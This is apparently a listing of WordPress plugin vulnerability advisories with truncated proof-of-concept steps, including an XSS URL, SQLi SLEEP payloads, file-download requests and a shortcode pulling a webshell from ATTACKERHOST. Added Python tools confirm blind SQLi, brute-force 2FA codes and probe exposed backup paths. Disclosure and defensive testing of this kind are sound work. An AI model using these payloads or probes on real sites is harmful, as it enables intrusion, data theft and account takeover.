Popup Builder < 4.2.3 - Unauthenticated Stored XSS
Description The plugin does not prevent unauthenticated visitors from updating existing popups and injecting raw JavaScript into them, which could lead to Stored XSS attacks. 1 Create a popup using the plugin 2 Run the following curl command, replacing $POPUPID with that popup's ID: curl --url...
Download Manager < 3.2.83 - Unauthenticated Protected File Download Password Leak
Description The plugin does not protect the passwords of password-protected downloads, leaking the password when an invalid one is submitted. With 223 being the ID of a password-protected download: curl -X POST --data 'wpdmID=223&dataType=json&execute=wpdmgetlink&action=wpdmajaxcall&password=123322'...
Backup Migration Staging < 1.3.6 - Sensitive Data Exposure
Description The plugin stores information about in-progress backups in easy-to-find, publicly accessible files, which may allow attackers monitoring those files to leak sensitive information from the site's backups. 1 Run a backup of the site 2 Notice the following files are all publicly available while the...
PayHere Payment Gateway < 2.2.12 - Unauthenticated Log Data Disclosure
Description The plugin automatically creates publicly accessible log files containing sensitive information when transactions occur. https://www.suppliment.lk/wp-content/uploads/payhere-logs/?SD https://www.medic.lk/wp-content/uploads/payhere-logs/?SD...
Html5 Video Player < 2.5.19 - Subscriber+ Stored XSS
Description The plugin does not sanitise and escape some of its player settings, which, combined with missing capability checks around the plugin, could allow any authenticated user, as low as a subscriber, to perform Stored Cross-Site Scripting attacks against high-privilege users like admins...
Elementor < 3.18.2 - Contributor+ Arbitrary File Upload to RCE via Template Import
Description The plugin is vulnerable to Remote Code Execution via arbitrary file upload in the template import functionality, allowing authenticated attackers with contributor-level access and above to upload files and execute code on the server. 1. Edit a post in Elementor. 2. Import a template folder...
ArtPlacer Widget < 2.20.7 - Editor+ SQLi
Description The plugin does not sanitize and escape the "id" parameter before using it in a query, leading to a SQL injection exploitable by editors and above. Note: due to the lack of a CSRF check, the issue could also be exploited via CSRF against a logged-in editor or above. As an editor, open...
WP Staging (Free < 3.1.3, Pro < 5.1.3) - Unauthenticated Backup Download
Description The plugin does not prevent visitors from leaking key information about ongoing backup processes, allowing unauthenticated attackers to download said backups later. The plugin creates temporary cache files when backing up sites, which are publicly accessible to anyone. Said cache fil...
Royal Elementor Addons and Templates < 1.3.81 - Unauthenticated Arbitrary Post Read
Description The plugin does not ensure that users accessing posts via an AJAX action and a REST endpoint (currently disabled in the plugin) have the right to do so, allowing unauthenticated users to access the content of arbitrary draft, private and password-protected posts/pages. WooCommerce needs to be...
Ecwid Ecommerce Shopping Cart < 6.12.5 - Arbitrary Plugin Settings Change via CSRF
Description The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack. http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=ecwidstorefrontsetpageslug&slug=hehehehe Besides, you can disable the...
JSON Content Importer < 1.5.4 - Reflected XSS
Description The plugin does not sanitise and escape the tab parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins. Make a logged-in admin open:...
Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure
Description The plugin does not prevent listing of the backups-dup-lite/tmp directory (or the backups-dup-pro/tmp directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to...
Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion
Description The plugin does not validate file paths provided via user input and lacks proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server. To download /etc/passwd: curl...
WP Sessions Time Monitoring Full Automatic < 1.0.9 - Unauthenticated SQL injection
Description The plugin does not sanitize the request URL or query parameters before using them in an SQL query, allowing unauthenticated attackers to extract sensitive data from the database via blind time-based SQL injection techniques, or in some cases an error- or union-based technique. Blind time...
Quiz Maker < 6.4.9.5 - Unauthenticated Email Address Disclosure
Description The plugin does not adequately authorize the aysquizauthorusersearch AJAX action, allowing an unauthenticated attacker to search the users of the system, ultimately leaking user email addresses. import string import requests baseurl =...
Quiz Maker < 6.4.9.5 - Reflected Cross-Site Scripting
Description The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting. Visit the following URL: https://example.com/wp-admin/admin.php?page=quiz-maker-questions&fake%22%3E%3Cscript%3Ealert/xss/%3C/script%3E=something...
rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Subscriber+ RCE
Description The plugin does not validate files to be uploaded, which could allow attackers with a low-privilege account (e.g. subscribers) to upload arbitrary files such as PHP files to the server. If the plugin's JSON API is enabled, any logged-in user may execute arbitrary code by uploading a PHP file. After...
BestWebSoft's Like & Share < 2.74 - Unauthenticated Password Protected Post Read
Description The plugin discloses the content of password-protected posts to unauthenticated users via a meta tag. In the web browser, view the source of any password-protected post and check the og:description meta tag...
rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Admin+ RCE
Description The plugin loads the contents of the import file in an unsafe manner, leading to remote code execution by privileged users. 1. As an admin, visit rtMedia Settings Export/Import. 2. Click the "Browse File" button beside "Import rtMedia Settings". 3. Upload a file with the extension .js...
WP Mail Log < 1.1.3 – Incorrect Authorization in REST API Endpoints
Description The plugin does not correctly authorize its REST API endpoints, allowing users with the Contributor role to view and delete data that should only be accessible to Admin users. The following actions may be taken by a Contributor user: --- /wmllogs - Information leak Execute the followi...
WP Mail Log < 1.1.3 – Contributor+ LFI in wml_logs/send_mail endpoint
Description The plugin does not properly validate file path parameters when attaching files to emails, leading to local file inclusion, and allowing an attacker to leak the contents of arbitrary files. Run the following within any page on the site, ensuring that the id parameter is set to a valid...
WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs/send_mail endpoint
Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor. Run the following within any page on the site. Notice that the request is delayed by the SLEEP call in th...
WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs endpoint
Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor. Run the following within a block editor page. Notice that the request is delayed by the SLEEP call in the...
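The three entries above (WP Sessions Time Monitoring and the two WP Mail Log SQL injections) all rely on the same observation: the request is delayed by a SLEEP call. A single delayed response is weak evidence on a real network, so the following added example (my code, not WPScan's or either plugin's) confirms a time-based blind injection by interleaving benign and delayed payloads and comparing medians. The injection point is abstracted as a caller-supplied send(payload) function; http_get_sender shows a real sender whose parameter name is an assumption, and fake_target is a constructed stand-in so the module runs offline.

```python
"""Confirm a suspected time-based blind SQL injection with repeated, interleaved timing.

Added example; not code from WPScan or from the plugins in the listing. The GET
parameter name used by `http_get_sender` and the `fake_target` behaviour are assumptions.
"""
import re
import statistics
import time
import urllib.parse
import urllib.request
from typing import Callable, List, Tuple

Sender = Callable[[str], None]


def timed(send: Sender, payload: str) -> float:
    """Wall-clock seconds taken by one request carrying `payload`."""
    start = time.perf_counter()
    send(payload)
    return time.perf_counter() - start


def confirm_time_based(send: Sender, benign: str, delayed: str,
                       expected_delay: float, rounds: int = 5) -> Tuple[bool, float, float]:
    """Alternate benign and SLEEP payloads `rounds` times and compare the medians.

    A one-shot "notice the request is delayed" check cannot tell injection from a
    cold cache or a slow hop. Interleaving exposes both payloads to the same
    conditions, the median discards single outliers, and the non-overlap test
    requires every delayed sample to beat every benign one.
    """
    benign_times: List[float] = []
    delayed_times: List[float] = []
    for _ in range(rounds):
        benign_times.append(timed(send, benign))
        delayed_times.append(timed(send, delayed))
    b_med = statistics.median(benign_times)
    d_med = statistics.median(delayed_times)
    # 0.8 tolerates server-side rounding of the sleep; tighten or loosen per target.
    confirmed = (d_med - b_med >= 0.8 * expected_delay
                 and min(delayed_times) > max(benign_times))
    return confirmed, b_med, d_med


def http_get_sender(url: str, param: str) -> Sender:
    """Real sender: put the payload in GET parameter `param` (name assumed) and read the body."""
    def send(payload: str) -> None:
        query = urllib.parse.urlencode({param: payload})
        with urllib.request.urlopen(f"{url}?{query}", timeout=60) as resp:
            resp.read()
    return send


def fake_target(vulnerable: bool) -> Sender:
    """Constructed stand-in: if `vulnerable`, honour SLEEP(n) in the payload as MySQL would."""
    def send(payload: str) -> None:
        m = re.search(r"SLEEP\(\s*([\d.]+)\s*\)", payload, re.IGNORECASE)
        time.sleep(float(m.group(1)) if (vulnerable and m) else 0.005)
    return send


if __name__ == "__main__":
    # Short sleeps keep the demo fast; against a real target use SLEEP(5) and expected_delay=5.
    for label, target in (("vulnerable", fake_target(True)), ("patched", fake_target(False))):
        ok, b, d = confirm_time_based(target, "1", "1 AND SLEEP(0.2)", expected_delay=0.2, rounds=3)
        print(f"{label}: confirmed={ok} benign_median={b:.3f}s delayed_median={d:.3f}s")
```

On a noisy link raise rounds rather than lowering the 0.8 factor; a false positive here costs far more analyst time than a few extra requests.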
WP Crowdfunding < 2.1.8 - Admin+ Stored XSS
Description The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup). 1. Add a campaign and for the reward...
BSK Forms Blacklist < 3.7 - Admin+ Stored Cross-Site Scripting
Description The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup). 1. In the plugin settings ex:...
WP Mail Log < 1.1.3 – Contributor+ Arbitrary File Upload to RCE
Description The plugin does not properly validate file extensions when uploading files to attach to emails, allowing attackers to upload PHP files, leading to remote code execution. Run the following JS code in any page on the server, setting the id variable to a valid ID of a log entry on the server...
Swift Performance Lite <= 2.3.6.14 - Unauthenticated Configuration Export
Description The plugin does not prevent unauthenticated users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens. curl --url 'http://vulnerable-site.tld/wp-admin/admin-post.php?luv-action=export'...
so-widgets-bundle < 1.51.0 - Admin+ Local File Inclusion
Description The plugin does not validate user input before using it to generate paths passed to include functions, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites. 1. Create a multisite WordPress setup, e.g. using Docker containers,...
Theme My Login 2FA < 1.2 - Lack of Rate Limiting
Description The plugin does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities; this would not take long, as the 2FA codes are 6 digits. https://packetstormsecurity.com/2309-exploits/wpmylogin-bruteforce.txt...
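To make the "shouldn't be too long" claim concrete and show the control that is missing, here is an added example (my code, not the plugin's or its fix): the worst-case cost of walking a 6-digit keyspace without throttling, next to a verifier that locks an account after a few failures and compares codes in constant time. RateLimitedVerifier, brute_force, the lockout parameters and the injectable FakeClock are illustrative choices.

```python
"""Brute-force cost of an unthrottled 6-digit 2FA code, and a throttled verifier.

Added example for the Theme My Login 2FA entry; not the plugin's code. Names and
lockout parameters are illustrative; the clock is injectable for deterministic runs.
"""
import hmac
import time
from typing import Callable, Dict, Optional

CODE_DIGITS = 6
KEYSPACE = 10 ** CODE_DIGITS  # 1,000,000 possible codes


def worst_case_seconds(requests_per_second: float) -> float:
    """Time to exhaust the whole keyspace at a given request rate with no throttling."""
    return KEYSPACE / requests_per_second


class RateLimitedVerifier:
    """Counts failures per account and locks the account after `max_failures`.

    Attempts made while locked are rejected without comparing, so the lockout
    bounds the number of guesses instead of merely slowing them down.
    """

    def __init__(self, max_failures: int = 5, lockout_seconds: float = 300.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.clock = clock
        self._failures: Dict[str, int] = {}
        self._locked_until: Dict[str, float] = {}

    def is_locked(self, account: str) -> bool:
        return self.clock() < self._locked_until.get(account, 0.0)

    def verify(self, account: str, submitted: str, expected: str) -> bool:
        if self.is_locked(account):
            return False
        # Constant-time comparison: no early exit that leaks a matching prefix.
        if hmac.compare_digest(submitted.encode(), expected.encode()):
            self._failures.pop(account, None)
            return True
        failures = self._failures.get(account, 0) + 1
        self._failures[account] = failures
        if failures >= self.max_failures:
            self._locked_until[account] = self.clock() + self.lockout_seconds
            self._failures[account] = 0
        return False


def brute_force(verify: Callable[[str, str], bool], account: str,
                max_tries: int = KEYSPACE) -> Optional[int]:
    """Guess 000000, 000001, ... and return the attempt number that succeeded, or None."""
    for i in range(max_tries):
        if verify(account, f"{i:0{CODE_DIGITS}d}"):
            return i + 1
    return None


class FakeClock:
    """Constructed clock so the lockout window can be tested without waiting."""

    def __init__(self) -> None:
        self.now = 0.0

    def __call__(self) -> float:
        return self.now

    def advance(self, seconds: float) -> None:
        self.now += seconds


if __name__ == "__main__":
    secret = "004217"  # constructed example code
    print(f"Unthrottled at 50 req/s: {worst_case_seconds(50) / 3600:.1f} h worst case")
    # With no effective limit the attacker simply walks the keyspace.
    open_v = RateLimitedVerifier(max_failures=KEYSPACE + 1)
    print("no limit  :", brute_force(lambda a, c: open_v.verify(a, c, secret), "alice"))
    # With 5 failures -> 5 minute lockout, guesses 6..N are rejected unexamined.
    limited = RateLimitedVerifier(max_failures=5, lockout_seconds=300, clock=FakeClock())
    print("throttled :", brute_force(lambda a, c: limited.verify(a, c, secret), "alice", max_tries=10_000))
```

If the code rotates (TOTP-style, every 30 s), each window presents a fresh one-in-a-million keyspace rather than a shrinking one, but the per-window success probability still accumulates across windows at thousands of requests per second; throttling per account (and per source) is the fix in both cases.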
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
Slider - Ultimate Responsive Image Slider < 3.5.12 - Subscriber+ Arbitrary Post Access
Description The plugin does not ensure that posts accessed via an AJAX action are slides that can be viewed by the user making the request, allowing any authenticated user, such as a subscriber, to access the content of arbitrary posts such as private, draft and password-protected ones. Run the below...
The Events Calendar < 6.2.8.1 - Unauthenticated Arbitrary Password Protected Post Read
Description The plugin discloses the content of password-protected posts to unauthenticated users via a crafted request. Append "?view=single-event" to the URL of a password-protected post, then view the source of the page and find the post content disclosed. Example:...
SmartCrawl WordPress SEO checker < 3.8.3 - Unauthenticated Password Protected Post Disclosure
Description The plugin does not prevent unauthorised users from accessing password-protected posts' content. As an unauthenticated user, view the source of any password-protected post in the web browser; the content of the post will be disclosed in the meta and script tags. Example:...
WP All Export (Free < 1.4.0, Pro < 1.8.6) - Admin+ RCE
Description The plugin does not validate and sanitise the wpquery parameter, which allows an attacker to run arbitrary commands on the remote server. 1. Go to "All Export" "New Export" 2. Select "WP Query Results" as the export type 3. Enter the payload phpinfo for the query. 4. Click customize and...
Quttera Web Malware Scanner < 3.4.2.1 - Directory Listing to Sensitive Data Exposure
Description The plugin doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code. http://yoursite/wordpress/wp-content/plugins/quttera-web-malware-scanner/runtime.log...
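Several entries in this listing (PayHere logs, Backup Migration, WP Staging, Duplicator's tmp directories, the Quttera runtime.log above) are the same bug class: a plugin writes sensitive material under a web-served path and relies on nobody finding it. The added example below (my code, not WPScan's or any plugin's) probes the paths those entries name and classifies each response as a directory listing, a readable file, or blocked. The wp-content/ prefix for the Duplicator tmp directories and the autoindex markers are assumptions; a fetch callable is injected so the logic runs offline against constructed responses, with urllib_fetch as the real implementation. Run it only against sites you are authorised to test.

```python
"""Check whether the publicly reachable paths named in this listing are exposed.

Added example; not code from WPScan or from the plugins. The Duplicator path prefix
and the directory-listing markers are assumptions; FAKE_RESPONSES is constructed data.
"""
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# (relative path, what the advisory says lives there)
CANDIDATE_PATHS: List[Tuple[str, str]] = [
    ("wp-content/uploads/payhere-logs/", "PayHere transaction logs"),
    ("wp-content/plugins/quttera-web-malware-scanner/runtime.log", "Quttera scan log"),
    ("wp-content/backups-dup-lite/tmp/", "Duplicator Lite temporary files"),  # prefix assumed
    ("wp-content/backups-dup-pro/tmp/", "Duplicator Pro temporary files"),    # prefix assumed
]

# Markers emitted by Apache mod_autoindex and nginx autoindex pages (assumed stable enough).
LISTING_MARKERS = ("<title>Index of ", "Parent Directory")

Fetch = Callable[[str], Tuple[int, str]]


def urllib_fetch(url: str) -> Tuple[int, str]:
    """Real fetch: return (status, first 4 KiB of body); HTTP errors map to their status."""
    req = urllib.request.Request(url, headers={"User-Agent": "exposure-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, ""
    except urllib.error.URLError:
        return 0, ""


def classify(path: str, status: int, body: str) -> str:
    """Turn one response into a verdict; a 200 on a directory only counts with listing markers."""
    if status != 200:
        return "not exposed"
    if path.endswith("/"):
        return "directory listing" if any(m in body for m in LISTING_MARKERS) else "200 but no listing"
    return "file readable"


def check_site(base_url: str, fetch: Fetch = urllib_fetch) -> Dict[str, str]:
    """Probe every candidate path under `base_url` and return path -> verdict."""
    base = base_url.rstrip("/") + "/"
    return {path: classify(path, *fetch(base + path)) for path, _ in CANDIDATE_PATHS}


def exposed(results: Dict[str, str]) -> List[str]:
    """Paths that need action: anything actually readable."""
    return [p for p, v in results.items() if v in ("directory listing", "file readable")]


# Constructed responses for an offline run: one listing, one readable log, two blocked.
FAKE_RESPONSES = {
    "https://example.test/wp-content/uploads/payhere-logs/":
        (200, "<html><head><title>Index of /wp-content/uploads/payhere-logs</title></head>..."),
    "https://example.test/wp-content/plugins/quttera-web-malware-scanner/runtime.log":
        (200, "[scan] /var/www/html/wp-content/plugins/... (constructed log line)"),
    "https://example.test/wp-content/backups-dup-lite/tmp/": (403, ""),
    "https://example.test/wp-content/backups-dup-pro/tmp/": (404, ""),
}


def fake_fetch(url: str) -> Tuple[int, str]:
    return FAKE_RESPONSES.get(url, (404, ""))


if __name__ == "__main__":
    results = check_site("https://example.test", fake_fetch)
    for path, verdict in results.items():
        print(f"{verdict:20s} {path}")
    print("exposed:", exposed(results))
```

A 200 on a directory without listing markers is reported separately on purpose: many hosts return the site's front page for unknown directories, and treating that as exposure produces noise.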
Product Catalog Enquiry for WooCommerce < 5.0.3 - Unauthenticated Stored XSS via Arbitrary Setting Update
Description The plugin does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users. 1 Make sure the plugin is configured with the "Catalog Mode" activated. 2 Launch the following from your browser's console:...
Autocomplete Location field Contact Form 7 < 3.0 - Admin+ Stored Cross-Site Scripting
Description The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup). 1. Go to "Contact Google Place API" 2...
WP All Export (Free < 1.4.1, Pro < 1.8.6) - Remote Code Execution via CSRF
Description The plugin does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged-in users perform unwanted actions leading to remote code execution. Submit the following form as a Super Admin; notice that it does not contain a nonce. Despite the error,...
Quttera Web Malware Scanner < 3.4.2.1 - Admin+ Path Traversal
Description The plugin does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks. 1 Go to http://yoursite/wordpress/wp-admin/admin.php?page=qutterawmscannerint 2 Click "Scan Now" 3 Click "Detected Threats" 4 Navigate to some Suspicio...
WP All Export (Free < 1.4.1, Pro < 1.8.6) - Author+ PHAR Deserialization via CSRF
Description The plugin does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution. 1. Ensure your WordPress...
EmbedPress < 3.9.2 - Reflected XSS
Description The plugin does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins. Make a logged-in admin open a page containing the HTML code below " / " /...
File Manager < 6.3 - Admin+ Arbitrary OS File/Folder Access + Path Traversal
Description The plugin does not restrict the file manager's root directory, allowing an administrator to set a root outside of the WordPress root directory, giving access to system files and directories even in a multisite setup, where site administrators should not be allowed to modify the sites...
EazyDocs < 2.3.4 - Subscriber+ SQLi
Description The plugin does not properly sanitize and escape the "data" parameter before using it in an SQL statement via an AJAX action, which could allow any authenticated user, such as a subscriber, to perform SQL Injection attacks. 1. Create a document then create some sections in the document 2...
EmbedPress < 3.9.2 - Reflected XSS
Description The plugin does not sanitise and escape a parameter before outputting it back in a page containing specific content, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins. On a post/page containing the following output whic...
LearnPress < 4.2.5.5 - Reflected Cross-Site Scripting
Description The plugin does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins. Make a logged-in admin open v 4.2.5.2 -...
WP Not Login Hide <= 1.0 - Admin+ Stored XSS
Description The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup). 1. Visit the "WPNLH" interface availab...
Contact Form Email < 1.3.44 - Editor+ Stored Cross-Site Scripting
Description The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup). 1. Create a form and navigate to 'Edit...
Popup box < 3.8.6 - Admin+ Stored XSS in Popup Settings
Description The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admins to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup). 1. Add a new Popup 2. In the "Popups...
Easy Newsletter Signups <= 1.0.4 - Admin+ SQLi
Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins. 1. From "Easy Newsletter Signups", select an email address and then click "Export to CSV" 2. Intercept the...
Frontend File Manager < 22.7 - Editor+ Arbitrary File Download
Description The plugin allows an Editor+ user to bypass the file download logic and download files such as wp-config.php. 1 Create a new post with this shortcode - ffmwp 2 Go to the new post and upload any file 3 After that go to the main page of the plugin for users...